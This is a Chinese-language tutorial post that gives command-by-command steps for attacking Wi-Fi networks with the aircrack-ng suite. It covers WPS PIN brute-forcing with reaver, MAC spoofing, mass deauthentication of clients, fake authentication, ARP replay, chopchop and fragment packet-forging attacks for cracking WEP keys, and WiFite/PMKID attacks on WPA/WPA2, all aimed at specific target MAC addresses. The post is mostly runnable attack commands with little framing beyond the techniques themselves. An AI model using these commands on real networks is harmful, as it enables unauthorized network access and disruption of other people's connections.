亲宝软件园·资讯

展开

aireplay包注入攻击

Micr067 人气:3
reaver爆破WPS PIN码:
  airodump-ng wlan0
  reaver -i wlan0 -b D0:76:E7:51:2A:78 -vv
 
macchanger更改MAC地址:
  macchanger -r wlan0
  -r:随机更换MAC
  -m:设置指定的MAC地址
  macchanger -m 72:8e:9c:2d:a8:bb wlan0
 
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
当目标在有客户端在进行下载、看视频等操作时Date值会剧增。
 
此时开启wireshark打开airodump-ng捕获的cap数据包,可以看到客户端与路由器之间的交互信息
为了能够快速获得大量有用的数据包,可以使用deauth攻击将客户端与目标AP的连接打断再重连。
aireplay-ng --deauth 20000 -a 50:2B:73:18:ED:81 -c A4:50:46:E0:FA:06 wlan0mon
 
airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon
50:2B:73:18:ED:81 00:02:6f:be:66:41
 
fakeauth攻击
  当目标AP无客户端连接时,我们可以使用无线网卡进行fakeauth(伪认证)攻击与目标AP交互。
  查看无线网卡MAC使用macchanger -s wlan0mon命令。
  aireplay-ng --fakeauth 0 -a 50:2B:73:18:ED:81 -c 00:02:6f:be:66:41 wlan0mon
  --fakeauth delay:伪装一个客户端和AP进行连接,其中delay表示连接的延迟时间。
 
ArpRequest注入攻击
  ArpRequest注入攻击是一种抓包后分析重发的过程,通过这种方式可以刺激产生大量交互数据。
  aireplay-ng --arpreplay -b 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
 
chopchop攻击
  aireplay-ng --chopchop -a 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
  --chopchop:快速攻击模式,该攻击模式用来获得一个包含密钥数据的xor文件。
 
  然后使用Packetforge-ng(网络数据包伪造工具)伪造数据包,packetforge-ng使用方法如下:
  packetforge-ng <mode> <options>
  packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y replay-1219-232225.xor -w chopchop-packet
  -0,--arp:伪造一个arp的数据包
  -l <ip[:port]> : 设置源IP地址和端口
  -k <ip[:port]> : 设置目标IP地址和端口
  -y <file> : 从指定文件读取PRGA(wep加密中间量)
 
  aireplay-ng -2 -r chopchop-packet wlan0mon
  -2,--interactive : 交互式帧选择
  -r <file> : 从pcap文件中提取数据包
 
  aircrack-ng chopchop-01.cap
 
fragment攻击
  fargmentg攻击通过生成有效的密钥流来进一步进行来破解无线密码。
  aireplay-ng --fragment -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 wlan0mon
 
  packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1219-232225.xor -w fargment-packet
 
  aireplay-ng -2 -r fragment-packet wlan0mon
 
  aircrack-ng fragment-01.cap
 
 
WiFite破解WEP/WPA/WPA2
  Wifite是一款自动化wifi密码破解工具,特点是支持多个wep,wpa加密的wifi网络,而且过程自动配置,无需人员干预!而且WiFi支持调用hcxdumptool、hcxtools和hashcat进行PMKID攻击。
  PMKID攻击是一种无需四次握手包即可破解WPA&WPA2密码的攻击方式,使用PMKID破解WPA预共享密钥的方法,与现有的其它破解方法不同,该方法不再需要抓取完整的EAPOL四次握手包,只需要一个EAPOL帧中的RSN IE(Robust Security Network Information Element)即可,具体可以参考
https://www.freebuf.com/articles/wireless/179953.html

加载全部内容

相关教程
猜你喜欢
用户评论